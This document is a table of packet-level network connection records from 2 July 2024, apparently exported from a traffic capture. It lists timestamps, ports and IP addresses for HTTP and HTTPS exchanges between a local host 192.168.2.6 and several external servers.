Jul 2, 2024 00:05:08.646156073 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646162033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646168947 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.646172047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646188021 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646188021 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646195889 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646198034 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646209002 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646219015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646219015 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.646229029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646239996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646245956 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646245956 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646250010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646260977 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646265984 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646270990 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646281004 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646291018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646306038 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646311045 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646311045 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646317959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646327019 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646328926 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646339893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646349907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646354914 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646365881 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646375895 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646385908 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646401882 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646401882 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646431923 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647104979 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647115946 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647125959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647135973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647145987 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647150993 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647156000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647167921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647177935 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647186995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647192955 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647211075 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647262096 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647314072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647324085 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647339106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647350073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647360086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647371054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647381067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647387028 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647387028 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647392035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647401094 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647401094 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647412062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647423029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647438049 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647439003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647449970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647459984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647463083 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647470951 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647484064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647495031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647500038 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647512913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647516966 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647524118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647532940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647543907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647548914 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647552967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647562981 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647568941 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647578001 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647588015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647597075 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647598028 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647608995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647619009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647624969 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647629023 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647639036 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647639990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647650003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647659063 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647664070 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647667885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647677898 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647685051 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647689104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647699118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647708893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647716999 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647720098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647730112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647730112 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647739887 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647751093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647766113 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647775888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647775888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647775888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647784948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647794962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.647795916 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647805929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.647814035 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.647839069 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.647883892 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.647888899 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.648281097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648292065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648302078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648312092 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648322105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.648333073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.648341894 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648343086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.648355007 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.648370981 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.648374081 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648391962 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.648421049 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.648462057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.648472071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.648492098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.648504019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648509979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648514986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648514986 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.648525000 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648535013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648544073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648555040 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648566961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648569107 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.648571968 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648576975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648587942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648598909 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648605108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648605108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648617983 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648627996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648628950 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648639917 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648644924 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648650885 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648663044 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648672104 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648675919 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648684025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648694992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648705006 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648705006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648705006 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648718119 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648730040 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648741007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648742914 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648751974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648761988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.648772955 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648792982 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.648808002 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.649846077 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649857998 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649868011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649878025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649887085 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649898052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649907112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649909973 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.649909973 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.649918079 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649929047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649938107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.649938107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649950027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649955034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649962902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.649966955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649976015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649981022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.649991989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.650002003 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.650007963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.650012016 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.650017977 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.650022030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.650027037 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.650031090 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.650032997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.650038958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.650043964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.650049925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.650115967 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.650119066 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.650129080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.650979042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.650990009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651000977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651010990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651021004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651031971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651036978 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651036978 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651042938 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651052952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651062012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651066065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651072979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651082993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651089907 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651093006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651108980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651119947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.651120901 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651119947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.651139021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651143074 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651144981 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.651151896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651161909 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651170015 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.651174068 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651185036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651199102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.651209116 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651216984 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.651216984 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.651221037 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651232004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651237011 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.651242971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651253939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651263952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651278973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651308060 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651649952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651799917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651810884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651820898 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651827097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651832104 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651838064 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651842117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651846886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651850939 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651851892 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651864052 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651869059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651875019 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651885033 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651909113 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651921988 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651930094 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651941061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651945114 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651949883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651959896 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651969910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651981115 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.651983976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651983976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.651990891 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.652000904 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.652010918 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.652012110 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.652020931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.652030945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.652041912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.652041912 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.652041912 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.652051926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.652080059 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.652103901 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.652939081 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.652950048 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.652961016 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.652970076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.652981043 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.652987957 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.652993917 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653004885 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653016090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653026104 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653029919 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.653029919 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.653036118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653048038 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653050900 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.653065920 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653078079 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653079033 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.653089046 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653100014 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653110981 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653115988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653119087 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.653127909 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653137922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653146029 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.653146029 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.653147936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653158903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653168917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653179884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.653182983 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.653182983 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.653189898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653199911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653209925 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.653214931 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.653214931 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.653264046 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.653264046 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654134989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654146910 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654155970 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654165983 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654175997 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654182911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654187918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654200077 CEST	49717	80	192.168.2.6	77.91.77.80
